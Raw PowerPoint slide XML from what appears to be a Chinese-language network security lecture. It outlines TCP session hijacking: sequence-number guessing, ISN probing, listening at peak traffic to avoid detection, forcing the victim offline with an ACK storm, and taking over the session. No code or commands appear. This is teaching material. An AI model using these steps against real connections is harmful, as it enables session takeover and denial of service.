                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>劫持会话</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="260122" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2339975" y="3429000"/>
            <a:ext cx="1728788" cy="792163"/>
            <a:chOff x="1474" y="2160"/>
            <a:chExt cx="1089" cy="499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="260118" name="Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1474" y="2160"/>
              <a:ext cx="907" cy="499"/>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260119" name="Text Box 23"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="1613427">
              <a:off x="1519" y="2205"/>
              <a:ext cx="1044" cy="250"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>4 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>迫使</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>下线</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>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0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395536" y="404664"/>
            <a:ext cx="7793037" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>会话劫持的原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261123" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="1484784"/>
            <a:ext cx="4320480" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>连接（会话）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>建立：三次握手</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>终止：正常情况四次握手</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>会话状态</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>标识：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>+SN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="-25000" smtClean="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>—— </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>SN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="-25000" smtClean="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="-25000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>成功劫持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会话关键：猜测序列</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>号</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="261124" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4644008" y="1539849"/>
          <a:ext cx="4300478" cy="4553447"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s328839" name="位图图像" r:id="rId1" imgW="3562350" imgH="3771900" progId="PBrush">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="位图图像" r:id="rId1" imgW="3562350" imgH="3771900" progId="PBrush">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Picture 3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539849"/>
                        <a:ext cx="4300478" cy="4553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6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{60E3BDA2-EE3A-4650-955D-7B8A6C331119}"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1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1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11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1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279.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72387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>发现目标</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>探查远程机器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ISN(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>初始序列号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>规律</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等待或者监听会话</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>最好在流量高峰期间进行，不容易被发现，而且可以有比较多可供选择的会话</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>猜测序列号</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使被劫持方下线</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>风暴，拒绝服务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>接管会话</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>如果在同一个子网中，则可以收到响应，否则要猜测服务器的动作</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272386" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>实施会话劫持的一般性过程</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5F730482-8678-48AE-89B7-744C9F0441DD}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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2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23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238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238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7238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238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72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autoUpdateAnimBg="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sz="3600"/>
              <a:t>网络安全威胁国家基础设施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5209" name="Group 89"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1828800"/>
            <a:ext cx="8086725" cy="3749675"/>
            <a:chOff x="528" y="1200"/>
            <a:chExt cx="5094" cy="2362"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5210" name="AutoShape 90"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="1680"/>
              <a:ext cx="2688" cy="1584"/>
            </a:xfrm>
            <a:prstGeom prst="cloudCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -48213"/>
                <a:gd name="adj2" fmla="val 15023"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="66FFFF"/>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3200" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>因特网</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5211" name="Oval 91"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4128" y="1680"/>
              <a:ext cx="288" cy="336"/>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 name="Oval 92"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3216" y="2736"/>
              <a:ext cx="384" cy="432"/>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 name="Oval 93"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2544" y="2400"/>
              <a:ext cx="336" cy="432"/>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4" name="Oval 94"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4080" y="2688"/>
              <a:ext cx="336" cy="336"/>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5" name="Oval 95"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4608" y="2448"/>
              <a:ext cx="336" cy="384"/>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6" name="Oval 96"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2736" y="1920"/>
              <a:ext cx="336" cy="432"/>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7" name="Oval 97"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4608" y="1872"/>
              <a:ext cx="336" cy="432"/>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8" name="AutoShape 98"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-1886655">
              <a:off x="576" y="1392"/>
              <a:ext cx="2304" cy="798"/>
            </a:xfrm>
            <a:prstGeom prst="irregularSeal1">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="18900000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="FFFF66"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>安全漏洞危害在增大</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFF66"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="5219" name="Object 99"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="624" y="2448"/>
            <a:ext cx="557" cy="525"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s632291" name="剪贴画" r:id="rId1" imgW="2287270" imgH="2155825" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="剪贴画" r:id="rId1" imgW="2287270" imgH="2155825" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture 16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2448"/>
                          <a:ext cx="557" cy="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0" name="Text Box 100"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="528" y="3024"/>
              <a:ext cx="1726" cy="250"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000099"/>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r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                  <a:solidFill>
                    <a:srgbClr val="CCFF99"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>信息对抗的威胁在增加</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5221" name="Oval 101"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2304" y="2208"/>
              <a:ext cx="384" cy="624"/>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 name="Oval 102"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2496" y="2160"/>
              <a:ext cx="384" cy="960"/>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3" name="Object 103"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="3168" y="2880"/>
            <a:ext cx="543" cy="576"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s632292" name="剪贴画" r:id="rId3" imgW="1951990" imgH="2065655" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="剪贴画" r:id="rId3" imgW="1951990" imgH="2065655" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture 16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880"/>
                          <a:ext cx="543"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4" name="Object 104"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="4032" y="1200"/>
            <a:ext cx="634" cy="698"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s632293" name="剪贴画" r:id="rId5" imgW="3116580" imgH="3437255" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="剪贴画" r:id="rId5" imgW="3116580" imgH="3437255" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture 16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 y="1200"/>
                          <a:ext cx="634" cy="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 name="Object 105"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="4656" y="2448"/>
            <a:ext cx="672" cy="546"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s632294" name="剪贴画" r:id="rId7" imgW="1112520" imgH="906145" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="剪贴画" r:id="rId7" imgW="1112520" imgH="906145" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture 16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2448"/>
                          <a:ext cx="672" cy="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6" name="Object 106"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="2256" y="2496"/>
            <a:ext cx="422" cy="439"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s632295" name="剪贴画" r:id="rId9" imgW="4425950" imgH="4594225" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="剪贴画" r:id="rId9" imgW="4425950" imgH="4594225" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture 16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 y="2496"/>
                          <a:ext cx="422" cy="4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7" name="Object 107"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="3984" y="2832"/>
            <a:ext cx="692" cy="494"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s632296" name="剪贴画" r:id="rId11" imgW="2957830" imgH="2109470" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="剪贴画" r:id="rId11" imgW="2957830" imgH="2109470" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture 16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2832"/>
                          <a:ext cx="692" cy="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8" name="Object 108"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="2448" y="1632"/>
            <a:ext cx="559" cy="576"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s632297" name="剪贴画" r:id="rId13" imgW="395605" imgH="407670" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="剪贴画" r:id="rId13" imgW="395605" imgH="407670" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture 16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8" y="1632"/>
                          <a:ext cx="559"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9" name="Object 109"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="4560" y="1656"/>
            <a:ext cx="816" cy="511"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s632298" name="剪贴画" r:id="rId15" imgW="5905500" imgH="3697605" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="剪贴画" r:id="rId15" imgW="5905500" imgH="3697605" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture 16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0" y="1656"/>
                          <a:ext cx="816" cy="5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30" name="Text Box 110"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
